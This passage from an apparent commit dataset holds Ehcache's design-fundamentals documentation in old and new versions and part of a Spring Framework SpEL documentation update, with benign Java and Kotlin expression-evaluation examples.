himself, he needs to provide all `Service` instances required by the `UserManagedCache`.\nAlso he'll need to invoke lifecycle methods on it (see <<state-transitions>>) and finally keep a reference to it, as it\nwon't available in any `CacheManager`.\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/userManagedCache.png[UserManagedCache]\n\n== State transitions\n\nA lifecycled instance, e.g. a `CacheManager` or a `UserManagedCache`, has three states represented by the\n`org.ehcache.Status` enum:\n\n . `UNINITIALIZED`: The instance can't be used, it probably just got instantiated or got `.close()` invoked on it;\n . `MAINTENANCE`: The instance is only usable by the thread that got the _maintenance lease_ for it. Special maintenance\n operations can be performed on the instance;\n . `AVAILABLE`: The operational state of the instance, all operations can be performed by any amount of threads.\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/stateTransitions.png[Statuses & transitions]\n\nState should only be maintained at the _higher_ user-visible API instance, e.g. a concrete `Cache` instance like `Ehcache`.\nThat means that it is the warrant for blocking operations during state transitions or on an _illegal state_. No need for\nthe underlying data structure to do so too (e.g. `Store`), as this would come to much higher cost during runtime.\n\nNOTE: A generic utility class `StatusTransitioner` encapsulate that responsibility and should be reusable across types that\nrequire enforcing lifecycle constraints.\n\n== Configuration types and builders\n\nIn the most generic sense, configuration types are used to _configure_ a given service _while_ it's being constructed. A\nbuilder exposes a user-friendly DSL to configure and build _runtime instances_ (e.g. `CacheManager`). Finally runtime\nconfiguration types are configured from configuration types and used at runtime by the actual configured instance,\nproviding a way for the user to mutate the behavior of that instance at runtime in limited ways.\n\n=== Configuring stuff\n\nYou don't necessarily ever get exposed to a _configuration_ for a given type being constructed. The builder can hide it\nall from you and will create the actual configuration at `.build()` invocation time. Configuration types are always\nimmutable. Instances of these types are used to configure some part of the system (e.g. `CacheManager`, `Cache`,\n`Service`, ...). If a given configured type has a requirement to modify it's configuration, a additional _runtime\nconfiguration_ is introduced, e.g. `RuntimeCacheConfiguration`. That type will expose additional mutative methods for\nattributes that are mutable. Internally it will also let consumers of the type register listener for these attributes.\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/config.png[Configuration types]\n\n==== `ServiceProvider` and `ServiceConfiguration`\n\nA special type of configuration is the `ServiceConfiguration<T extends Service>` type. That configuration type enables\nthe `ServiceProvider` to lookup the `ServiceFactory<T extends Service>` to use to create the `Service` that's being\nconfigured, see `ServiceProvider.findServiceFor(ServiceConfiguration<T> config): T extends Service`. This is what\nhappens underneath of that call when the `CacheManager` or a `ServiceFactory` looks up `Service` instances:\n\n . The caller invokes `ServiceProvider.findServiceFor`\n . The `ServiceProvider` looks up whether it already has that `Service`\n .. If it does, that instance is being retuned\n .. If it doesn't, it looks up all `ServiceFactory` it has for one that creates instances of that `Service` type.\n ... If one is found in that `ServiceFactory` repository, it uses that to create the instance\n ... If none is found, it uses the JDK's `java.util.ServiceLoader` service to load `ServiceFactory` and recheck\n .. If nothing could be found, an Exception is thrown\n\n=== Builder design guidelines\n\n - Copy the instance, apply modification and return the copy. Never modify and return `this`\n - Accept other builders as input, instead of just the actual \"other thing's\" configuration\n - Provide names methods for boolean or `Enum` based settings. Apply this while keeping in mind that we do not want\n method explosion on the builder as a whole. \n - Default values are to be handled inside the configuration classes and not duplicated inside the builder.\n\n== `javax.cache` API implications\n\nWhile we know we don't want to strictly go by the JSR-107 (aka JCache) API contract in the Ehcache3 APIs (e.g. `CacheLoader` &\n`CacheWriter` contracts when concurrent methods on the `Cache` are invoked), we still need a way to have our JCache\nimplementation pass the TCK. It is important to at least read the specification with regards to any feature that's being\nimplemented and list dissimilarities as well as how they'll be addressed in the 107 module.\n\n== The `PersistentCacheManager`\n\nThe `PersistentCacheManager` interface adds lifecycle methods to the `CacheManager` type. Those lifecycle methods enable\nthe user to completely destroy `Cache` instances from a given `CacheManager` (e.g. destroy the clustered state of a `Cache` entirely,\nor remove all the data of a `Cache` from disk); as well as go into _maintenance mode_ (see <<state-transitions>> section).\n\n=== `CacheManagerBuilder.with()` 's extension point\n\nA `CacheManagerBuilder` builds _at least_ a `CacheManager`, but its\n`.with(CacheManagerConfiguration<N>): CacheManagerBuilder<N>` let's you build any subtype of `CacheManager` (currently\nthe supported types are a closed set of defined subtypes, but this could be extended to an open set later).\n\n[source,java]\n----\n\nPersistentCacheManager cm = newCacheManagerBuilder() \/\/ <1>\n .with(new CacheManagerConfiguration<PersistentCacheManager>()) \/\/ <2>\n .build(true); \/\/ <3>\n----\n\n<1> the `T` of `CacheManagerBuilder<T extends CacheManager>` is still of `CacheManager`\n<2> the `CacheManagerConfiguration` passed in to `.with` now narrows `T` down to `PersistentCacheManager`\n<3> returns the instance of `T` built\n\n=== Locally persistent\n\nWhen building a `PersistentCacheManager` the `CacheManagerConfiguration<PersistentCacheManager>` passed to the builder\nwould let one configure all persistent related aspects of `Cache` instances managed by the `CacheManager`, e.g. root\nlocation for writing cached data to.\n\n=== Clustered topology\n\nIn a Terracotta clustered scenario, all clustered `Cache` instances are considered persistent (i.e. will survive the\n_client_ JVM restart). So the idea is to provide all clustered configuration passing such a\n`CacheManagerConfiguration<PersistentCacheManager>` instance, with all the Terracotta client configuration stuff, to the\n`CacheManagerBuilder` at construction time.\n\n==== Persistence configuration\n\nAny given persistent `Cache` uses the lifecycle as described above in <<state-transitions>>. Yet the data on disk, or\ndatastructures on disk to store. We think of states of those structures in these terms:\n\n . Inexistent, nothing there: nothing can be stored until these exist;\n . Online: the datastructures are present (with or without any data), referenced by the `Store` and the `Cache` is usable;\n . Offline: the datastructures are present (with or without data), not referenced by any `Store` and nothing accesses it.\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/persistentStateTransitions.jpg[Persistence and statuses & their transitions]\n\nThe user can fallback to the maintenance mode and the `Maintainable` instance returned when transitioning to the\nmaintenance state. That `Maintainable` can be used to:\n\n - `Maintainable.create()`, moving from nothing to online; _or_\n - `Maintainable.destroy()`, moving from offline to nothing\n\nthe associated data for a given `Cache` on disk or within the Terracotta Server stripe(s).\n\nWe also want to provide with configuration based _modes_ to automatically:\n\n - Create the persistent data structures if it doesn't already exit;\n - Drop the persistent data structures if it exists, and create it anew;\n - Verify the persistent data structures is there, otherwise fail fast;\n - Create the persistent data structures expecting them to not be there, otherwise fail fast.\n","old_contents":"= Ehcache Design Fundamentals\n\n:toc:\n\n== `CacheManager`, `Cache` and their dependencies\n\nAs in the 1.x & 2.x line, Ehcache has the notion of a `CacheManager`, who manages `Cache` instances. Managing a `Cache`\nmeans fulfilling a couple of roles:\n\n - Life cycling it: e.g. `.init()`, `.closing()` the `Cache`;\n - Providing it with `Service` instance: A `CacheManager` comes with a set of base abstract services `Cache` can use\n and that it will lifecycle too; but the `CacheManager` can lifecycle any amount of additional `Service` types that\n gets registered with it. These `Service` can then be looked up, e.g. by `Cache` or other `Service` instances, using the\n `ServiceProvider` interface;\n - Finally, the `CacheManager` acts as a repository of alias'ed `Cache` instances. Unlike in the previous versions, `Cache`\n instances aren't named, but are registered with the `CacheManager` under an _alias_. The `Cache` is never aware of this.\n\nThis diagram tries to summarize the different roles:\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/baseTypes.png[Base Types]\n\nA user will only mostly interact with the `CacheManager` and `Cache` API types... He may need to configure specific\n`Service` types for his `Cache` instances to use. See <<configuration-types-and-builders>>\n\n=== The `CacheManager`\n\nWhile the `CacheManager` does act as a repository, it is _not_ possible to add a `Cache` directly to a `CacheManager`.\nA `Cache` can be created by a `CacheManager`, which will then keep a reference to it, alias'ed to a user provided name.\nTo remove that `Cache` from the `CacheManager`, it has to be explicitly removed using `CacheManager.removeCache(String)`.\nUpon that method successfully returning, the `Cache` 's status will be `Status.UNINITIALIZED` and as such will not be\nusable anymore, see <<state-transitions>> section below.\n\n=== The `Cache`\n\nA `Cache` is backed by a `Store` where all cached entries (i.e. key to value mappings) are held. The `Cache` doesn't know\nwhat topology this `Store` is using; whether it's storing these entries on the JVM's heap, off the heap, on disk, on a remote\nJVM or any combination of the above.\n\nWhen a `Cache` is being constructed, e.g. by the `CacheManager` on a `.createCache()` method invoke, the `CacheManager`\nwill lookup a `Store.Provider` which is one of the bundled `Service` types of Ehcache, asking it to create a `Store` based\non the `CacheConfiguration` used to configure the given `Cache`. That indirection, makes both the `Cache` as well as the\n`CacheManager` ignorant of what topology this `Cache` is to use. Ehcache comes with a `DefaultStoreProvider` that will\nbe loaded by the `ServiceProvider`, should none be explicitly provided. That in turn will resolve the required `Store`\ninstance to be provided to the `Cache` being created.\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/cacheStore.png[Cache's Store]\n\nThe `Cache` also tries to never _fails_ on operations invoked, e.g. a get shouldn't result in throwing an exception if the\n`Store` that backs it up uses serialization and fails to retrieve the mapping. Instead, Ehcache tries to be resilient and\nwill, by default, try to clear that mapping from its `Store` and return `null` instead to the user. It is the responsibility of the\n`Cache` to handle the exceptions a `Store` may throw (the `Store` interface explicitly declares it throws\n`CacheAccessException`, which is a checked exception). The `Cache` will delegate failures to the `ResilienceStrategy`,\nwhich in turn is responsible for handling the failure.\n\nCurrently, Ehcache only has a single `ResilienceStrategy`, which is supporting single-JVM deployments, and will try to\n_heal_ the `Store` on failure and making the invoking action on a `Cache` a no-op. We'll add more `ResilienceStrategy`\nand will make it pluggable, when we move on to distributed topologies.\n\n=== The new `UserManagedCache`\n\nThe `UserManagedCache` are, as the name implies, managed by the user instead of being managed by a `CacheManager`. While\nthese instances are meant to be lightweight, short-lived ones, nothing prohibits a user from building a distributed\n`UserManagedCache` if so desired.\n\nAs the user manages that instance himself, he needs to provide all `Service` instances required by the `UserManagedCache`.\nAlso he'll need to invoke lifecycle methods on it (see <<state-transitions>>) and finally keep a reference to it, as it\nwon't available in any `CacheManager`.\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/userManagedCache.png[UserManagedCache]\n\n== State transitions\n\nA lifecycled instance, e.g. a `CacheManager` or a `UserManagedCache`, has three states represented by the\n`org.ehcache.Status` enum:\n\n . `UNINITIALIZED`: The instance can't be used, it probably just got instantiated or got `.close()` invoked on it;\n . `MAINTENANCE`: The instance is only usable by the thread that got the _maintenance lease_ for it. Special maintenance\n operations can be performed on the instance;\n . `AVAILABLE`: The operational state of the instance, all operations can be performed by any amount of threads.\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/stateTransitions.png[Statuses & transitions]\n\nState should only be maintained at the _higher_ user-visible API instance, e.g. a concrete `Cache` instance like `Ehcache`.\nThat means that it is the warrant for blocking operations during state transitions or on an _illegal state_. No need for\nthe underlying data structure to do so too (e.g. `Store`), as this would come to much higher cost during runtime.\n\nNOTE: A generic utility class `StatusTransitioner` encapsulate that responsibility and should be reusable across types that\nrequire enforcing lifecycle constraints.\n\n== Configuration types and builders\n\nIn the most generic sense, configuration types are used to _configure_ a given service _while_ it's being constructed. A\nbuilder exposes a user-friendly DSL to configure and build _runtime instances_ (e.g. `CacheManager`). Finally runtime\nconfiguration types are configured from configuration types and used at runtime by the actual configured instance,\nproviding a way for the user to mutate the behavior of that instance at runtime in limited ways.\n\n=== Configuring stuff\n\nYou don't necessarily ever get exposed to a _configuration_ for a given type being constructed. The builder can hide it\nall from you and will create the actual configuration at `.build()` invocation time. Configuration types are always\nimmutable. Instances of these types are used to configure some part of the system (e.g. `CacheManager`, `Cache`,\n`Service`, ...). If a given configured type has a requirement to modify it's configuration, a additional _runtime\nconfiguration_ is introduced, e.g. `RuntimeCacheConfiguration`. That type will expose additional mutative methods for\nattributes that are mutable. Internally it will also let consumers of the type register listener for these attributes.\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/config.png[Configuration types]\n\n==== `ServiceProvider` and `ServiceConfiguration`\n\nA special type of configuration is the `ServiceConfiguration<T extends Service>` type. That configuration type enables\nthe `ServiceProvider` to lookup the `ServiceFactory<T extends Service>` to use to create the `Service` that's being\nconfigured, see `ServiceProvider.findServiceFor(ServiceConfiguration<T> config): T extends Service`. This is what\nhappens underneath of that call when the `CacheManager` or a `ServiceFactory` looks up `Service` instances:\n\n . The caller invokes `ServiceProvider.findServiceFor`\n . The `ServiceProvider` looks up whether it already has that `Service`\n .. If it does, that instance is being retuned\n .. If it doesn't, it looks up all `ServiceFactory` it has for one that creates instances of that `Service` type.\n ... If one is found in that `ServiceFactory` repository, it uses that to create the instance\n ... If none is found, it uses the JDK's `java.util.ServiceLoader` service to load `ServiceFactory` and recheck\n .. If nothing could be found, an Exception is thrown\n\n=== Builder design guidelines\n\n - Copy the instance, apply modification and return the copy. Never modify and return `this`\n - Accept other builders as input, instead of just the actual \"other thing's\" configuration\n - Provide names methods for boolean or `Enum` based settings. Apply this while keeping in mind that we do not want\n method explosion on the builder as a whole. \n\n== `javax.cache` API implications\n\nWhile we know we don't want to strictly go by the JSR-107 (aka JCache) API contract in the Ehcache3 APIs (e.g. `CacheLoader` &\n`CacheWriter` contracts when concurrent methods on the `Cache` are invoked), we still need a way to have our JCache\nimplementation pass the TCK. It is important to at least read the specification with regards to any feature that's being\nimplemented and list dissimilarities as well as how they'll be addressed in the 107 module.\n\n== The `PersistentCacheManager`\n\nThe `PersistentCacheManager` interface adds lifecycle methods to the `CacheManager` type. Those lifecycle methods enable\nthe user to completely destroy `Cache` instances from a given `CacheManager` (e.g. destroy the clustered state of a `Cache` entirely,\nor remove all the data of a `Cache` from disk); as well as go into _maintenance mode_ (see <<state-transitions>> section).\n\n=== `CacheManagerBuilder.with()` 's extension point\n\nA `CacheManagerBuilder` builds _at least_ a `CacheManager`, but its\n`.with(CacheManagerConfiguration<N>): CacheManagerBuilder<N>` let's you build any subtype of `CacheManager` (currently\nthe supported types are a closed set of defined subtypes, but this could be extended to an open set later).\n\n[source,java]\n----\n\nPersistentCacheManager cm = newCacheManagerBuilder() \/\/ <1>\n .with(new CacheManagerConfiguration<PersistentCacheManager>()) \/\/ <2>\n .build(true); \/\/ <3>\n----\n\n<1> the `T` of `CacheManagerBuilder<T extends CacheManager>` is still of `CacheManager`\n<2> the `CacheManagerConfiguration` passed in to `.with` now narrows `T` down to `PersistentCacheManager`\n<3> returns the instance of `T` built\n\n=== Locally persistent\n\nWhen building a `PersistentCacheManager` the `CacheManagerConfiguration<PersistentCacheManager>` passed to the builder\nwould let one configure all persistent related aspects of `Cache` instances managed by the `CacheManager`, e.g. root\nlocation for writing cached data to.\n\n=== Clustered topology\n\nIn a Terracotta clustered scenario, all clustered `Cache` instances are considered persistent (i.e. will survive the\n_client_ JVM restart). So the idea is to provide all clustered configuration passing such a\n`CacheManagerConfiguration<PersistentCacheManager>` instance, with all the Terracotta client configuration stuff, to the\n`CacheManagerBuilder` at construction time.\n\n==== Persistence configuration\n\nAny given persistent `Cache` uses the lifecycle as described above in <<state-transitions>>. Yet the data on disk, or\ndatastructures on disk to store. We think of states of those structures in these terms:\n\n . Inexistent, nothing there: nothing can be stored until these exist;\n . Online: the datastructures are present (with or without any data), referenced by the `Store` and the `Cache` is usable;\n . Offline: the datastructures are present (with or without data), not referenced by any `Store` and nothing accesses it.\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/persistentStateTransitions.jpg[Persistence and statuses & their transitions]\n\nThe user can fallback to the maintenance mode and the `Maintainable` instance returned when transitioning to the\nmaintenance state. That `Maintainable` can be used to:\n\n - `Maintainable.create()`, moving from nothing to online; _or_\n - `Maintainable.destroy()`, moving from offline to nothing\n\nthe associated data for a given `Cache` on disk or within the Terracotta Server stripe(s).\n\nWe also want to provide with configuration based _modes_ to automatically:\n\n - Create the persistent data structures if it doesn't already exit;\n - Drop the persistent data structures if it exists, and create it anew;\n - Verify the persistent data structures is there, otherwise fail fast;\n - Create the persistent data structures expecting them to not be there, otherwise fail fast.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c11887fe8d119efb91403975c17a3bb231735b4","subject":"Use lowercase property names in SpEL examples","message":"Use lowercase property names in SpEL examples\n\nCloses gh-25538\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/docs\/asciidoc\/core\/core-expressions.adoc","new_file":"src\/docs\/asciidoc\/core\/core-expressions.adoc","new_contents":"[[expressions]]\n= Spring Expression Language (SpEL)\n\nThe Spring Expression Language (\"`SpEL`\" for short) is a powerful expression language that\nsupports querying and manipulating an object graph at runtime. The language syntax is\nsimilar to Unified EL but offers additional features, most notably method invocation and\nbasic string templating functionality.\n\nWhile there are several other Java expression languages available -- OGNL, MVEL, and JBoss\nEL, to name a few -- the Spring Expression Language was created to provide the Spring\ncommunity with a single well supported expression language that can be used across all\nthe products in the Spring portfolio. Its language features are driven by the\nrequirements of the projects in the Spring portfolio, including tooling requirements\nfor code completion support within the https:\/\/spring.io\/tools[Spring Tools for Eclipse].\nThat said, SpEL is based on a technology-agnostic API that lets other expression language\nimplementations be integrated, should the need arise.\n\nWhile SpEL serves as the foundation for expression evaluation within the Spring\nportfolio, it is not directly tied to Spring and can be used independently. To\nbe self contained, many of the examples in this chapter use SpEL as if it were an\nindependent expression language. This requires creating a few bootstrapping\ninfrastructure classes, such as the parser. Most Spring users need not deal with\nthis infrastructure and can, instead, author only expression strings for evaluation.\nAn example of this typical use is the integration of SpEL into creating XML or\nannotation-based bean definitions, as shown in\n<<expressions-beandef, Expression support for defining bean definitions>>.\n\nThis chapter covers the features of the expression language, its API, and its language\nsyntax. In several places, `Inventor` and `Society` classes are used as the target\nobjects for expression evaluation. These class declarations and the data used to\npopulate them are listed at the end of the chapter.\n\nThe expression language supports the following functionality:\n\n* Literal expressions\n* Boolean and relational operators\n* Regular expressions\n* Class expressions\n* Accessing properties, arrays, lists, and maps\n* Method invocation\n* Relational operators\n* Assignment\n* Calling constructors\n* Bean references\n* Array construction\n* Inline lists\n* Inline maps\n* Ternary operator\n* Variables\n* User-defined functions\n* Collection projection\n* Collection selection\n* Templated expressions\n\n\n\n\n[[expressions-evaluation]]\n== Evaluation\n\nThis section introduces the simple use of SpEL interfaces and its expression language.\nThe complete language reference can be found in\n<<expressions-language-ref, Language Reference>>.\n\nThe following code introduces the SpEL API to evaluate the literal string expression,\n`Hello World`.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tExpression exp = parser.parseExpression(\"'Hello World'\"); \/\/ <1>\n\tString message = (String) exp.getValue();\n----\n<1> The value of the message variable is `'Hello World'`.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval exp = parser.parseExpression(\"'Hello World'\") \/\/ <1>\n\tval message = exp.value as String\n----\n<1> The value of the message variable is `'Hello World'`.\n\n\nThe SpEL classes and interfaces you are most likely to use are located in the\n`org.springframework.expression` package and its sub-packages, such as `spel.support`.\n\nThe `ExpressionParser` interface is responsible for parsing an expression string. In\nthe preceding example, the expression string is a string literal denoted by the surrounding single\nquotation marks. The `Expression` interface is responsible for evaluating the previously defined\nexpression string. Two exceptions that can be thrown, `ParseException` and\n`EvaluationException`, when calling `parser.parseExpression` and `exp.getValue`,\nrespectively.\n\nSpEL supports a wide range of features, such as calling methods, accessing properties,\nand calling constructors.\n\nIn the following example of method invocation, we call the `concat` method on the string literal:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tExpression exp = parser.parseExpression(\"'Hello World'.concat('!')\"); \/\/ <1>\n\tString message = (String) exp.getValue();\n----\n<1> The value of `message` is now 'Hello World!'.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval exp = parser.parseExpression(\"'Hello World'.concat('!')\") \/\/ <1>\n\tval message = exp.value as String\n----\n<1> The value of `message` is now 'Hello World!'.\n\nThe following example of calling a JavaBean property calls the `String` property `Bytes`:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\t\/\/ invokes 'getBytes()'\n\tExpression exp = parser.parseExpression(\"'Hello World'.bytes\"); \/\/ <1>\n\tbyte[] bytes = (byte[]) exp.getValue();\n----\n<1> This line converts the literal to a byte array.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\t\/\/ invokes 'getBytes()'\n\tval exp = parser.parseExpression(\"'Hello World'.bytes\") \/\/ <1>\n\tval bytes = exp.value as ByteArray\n----\n<1> This line converts the literal to a byte array.\n\nSpEL also supports nested properties by using the standard dot notation (such as\n`prop1.prop2.prop3`) and also the corresponding setting of property values.\nPublic fields may also be accessed.\n\nThe following example shows how to use dot notation to get the length of a literal:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\t\/\/ invokes 'getBytes().length'\n\tExpression exp = parser.parseExpression(\"'Hello World'.bytes.length\"); \/\/ <1>\n\tint length = (Integer) exp.getValue();\n----\n<1> `'Hello World'.bytes.length` gives the length of the literal.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\t\/\/ invokes 'getBytes().length'\n\tval exp = parser.parseExpression(\"'Hello World'.bytes.length\") \/\/ <1>\n\tval length = exp.value as Int\n----\n<1> `'Hello World'.bytes.length` gives the length of the literal.\n\nThe String's constructor can be called instead of using a string literal, as the following\nexample shows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tExpression exp = parser.parseExpression(\"new String('hello world').toUpperCase()\"); \/\/ <1>\n\tString message = exp.getValue(String.class);\n----\n<1> Construct a new `String` from the literal and make it be upper case.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval exp = parser.parseExpression(\"new String('hello world').toUpperCase()\") \/\/ <1>\n\tval message = exp.getValue(String::class.java)\n----\n<1> Construct a new `String` from the literal and make it be upper case.\n\n\nNote the use of the generic method: `public <T> T getValue(Class<T> desiredResultType)`.\nUsing this method removes the need to cast the value of the expression to the desired\nresult type. An `EvaluationException` is thrown if the value cannot be cast to the\ntype `T` or converted by using the registered type converter.\n\nThe more common usage of SpEL is to provide an expression string that is evaluated\nagainst a specific object instance (called the root object). The following example shows\nhow to retrieve the `name` property from an instance of the `Inventor` class or\ncreate a boolean condition:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ Create and set a calendar\n\tGregorianCalendar c = new GregorianCalendar();\n\tc.set(1856, 7, 9);\n\n\t\/\/ The constructor arguments are name, birthday, and nationality.\n\tInventor tesla = new Inventor(\"Nikola Tesla\", c.getTime(), \"Serbian\");\n\n\tExpressionParser parser = new SpelExpressionParser();\n\n\tExpression exp = parser.parseExpression(\"name\"); \/\/ Parse name as an expression\n\tString name = (String) exp.getValue(tesla);\n\t\/\/ name == \"Nikola Tesla\"\n\n\texp = parser.parseExpression(\"name == 'Nikola Tesla'\");\n\tboolean result = exp.getValue(tesla, Boolean.class);\n\t\/\/ result == true\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ Create and set a calendar\n\tval c = GregorianCalendar()\n\tc.set(1856, 7, 9)\n\n\t\/\/ The constructor arguments are name, birthday, and nationality.\n\tval tesla = Inventor(\"Nikola Tesla\", c.time, \"Serbian\")\n\n\tval parser = SpelExpressionParser()\n\n\tvar exp = parser.parseExpression(\"name\") \/\/ Parse name as an expression\n\tval name = exp.getValue(tesla) as String\n\t\/\/ name == \"Nikola Tesla\"\n\n\texp = parser.parseExpression(\"name == 'Nikola Tesla'\")\n\tval result = exp.getValue(tesla, Boolean::class.java)\n\t\/\/ result == true\n----\n\n\n\n\n[[expressions-evaluation-context]]\n=== Understanding `EvaluationContext`\n\nThe `EvaluationContext` interface is used when evaluating an expression to resolve\nproperties, methods, or fields and to help perform type conversion. Spring provides two\nimplementations.\n\n* `SimpleEvaluationContext`: Exposes a subset of essential SpEL language features and\nconfiguration options, for categories of expressions that do not require the full extent\nof the SpEL language syntax and should be meaningfully restricted. Examples include but\nare not limited to data binding expressions and property-based filters.\n\n* `StandardEvaluationContext`: Exposes the full set of SpEL language features and\nconfiguration options. You can use it to specify a default root object and to configure\nevery available evaluation-related strategy.\n\n`SimpleEvaluationContext` is designed to support only a subset of the SpEL language syntax.\nIt excludes Java type references, constructors, and bean references. It also requires\nyou to explicitly choose the level of support for properties and methods in expressions.\nBy default, the `create()` static factory method enables only read access to properties.\nYou can also obtain a builder to configure the exact level of support needed, targeting\none or some combination of the following:\n\n* Custom `PropertyAccessor` only (no reflection)\n* Data binding properties for read-only access\n* Data binding properties for read and write\n\n\n[[expressions-type-conversion]]\n==== Type Conversion\n\nBy default, SpEL uses the conversion service available in Spring core\n(`org.springframework.core.convert.ConversionService`). This conversion service comes\nwith many built-in converters for common conversions but is also fully extensible so that\nyou can add custom conversions between types. Additionally, it is\ngenerics-aware. This means that, when you work with generic types in\nexpressions, SpEL attempts conversions to maintain type correctness for any objects\nit encounters.\n\nWhat does this mean in practice? Suppose assignment, using `setValue()`, is being used\nto set a `List` property. The type of the property is actually `List<Boolean>`. SpEL\nrecognizes that the elements of the list need to be converted to `Boolean` before\nbeing placed in it. The following example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tclass Simple {\n\t\tpublic List<Boolean> booleanList = new ArrayList<Boolean>();\n\t}\n\n\tSimple simple = new Simple();\n\tsimple.booleanList.add(true);\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\t\/\/ \"false\" is passed in here as a String. SpEL and the conversion service\n\t\/\/ will recognize that it needs to be a Boolean and convert it accordingly.\n\tparser.parseExpression(\"booleanList[0]\").setValue(context, simple, \"false\");\n\n\t\/\/ b is false\n\tBoolean b = simple.booleanList.get(0);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass Simple {\n\t\tvar booleanList: MutableList<Boolean> = ArrayList()\n\t}\n\n\tval simple = Simple()\n\tsimple.booleanList.add(true)\n\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\t\/\/ \"false\" is passed in here as a String. SpEL and the conversion service\n\t\/\/ will recognize that it needs to be a Boolean and convert it accordingly.\n\tparser.parseExpression(\"booleanList[0]\").setValue(context, simple, \"false\")\n\n\t\/\/ b is false\n\tval b = simple.booleanList[0]\n----\n\n\n[[expressions-parser-configuration]]\n=== Parser Configuration\n\nIt is possible to configure the SpEL expression parser by using a parser configuration\nobject (`org.springframework.expression.spel.SpelParserConfiguration`). The configuration\nobject controls the behavior of some of the expression components. For example, if you\nindex into an array or collection and the element at the specified index is `null`, SpEL\ncan automatically create the element. This is useful when using expressions made up of a\nchain of property references. If you index into an array or list and specify an index\nthat is beyond the end of the current size of the array or list, SpEL can automatically\ngrow the array or list to accommodate that index. In order to add an element at the\nspecified index, SpEL will try to create the element using the element type's default\nconstructor before setting the specified value. If the element type does not have a\ndefault constructor, `null` will be added to the array or list. If there is no built-in\nor custom converter that knows how to set the value, `null` will remain in the array or\nlist at the specified index. The following example demonstrates how to automatically grow\nthe list:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tclass Demo {\n\t\tpublic List<String> list;\n\t}\n\n\t\/\/ Turn on:\n\t\/\/ - auto null reference initialization\n\t\/\/ - auto collection growing\n\tSpelParserConfiguration config = new SpelParserConfiguration(true,true);\n\n\tExpressionParser parser = new SpelExpressionParser(config);\n\n\tExpression expression = parser.parseExpression(\"list[3]\");\n\n\tDemo demo = new Demo();\n\n\tObject o = expression.getValue(demo);\n\n\t\/\/ demo.list will now be a real collection of 4 entries\n\t\/\/ Each entry is a new empty String\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass Demo {\n\t\tvar list: List<String>? = null\n\t}\n\n\t\/\/ Turn on:\n\t\/\/ - auto null reference initialization\n\t\/\/ - auto collection growing\n\tval config = SpelParserConfiguration(true, true)\n\n\tval parser = SpelExpressionParser(config)\n\n\tval expression = parser.parseExpression(\"list[3]\")\n\n\tval demo = Demo()\n\n\tval o = expression.getValue(demo)\n\n\t\/\/ demo.list will now be a real collection of 4 entries\n\t\/\/ Each entry is a new empty String\n----\n\n\n\n[[expressions-spel-compilation]]\n=== SpEL Compilation\n\nSpring Framework 4.1 includes a basic expression compiler. Expressions are usually\ninterpreted, which provides a lot of dynamic flexibility during evaluation but\ndoes not provide optimum performance. For occasional expression usage,\nthis is fine, but, when used by other components such as Spring Integration,\nperformance can be very important, and there is no real need for the dynamism.\n\nThe SpEL compiler is intended to address this need. During evaluation, the compiler\ngenerates a Java class that embodies the expression behavior at 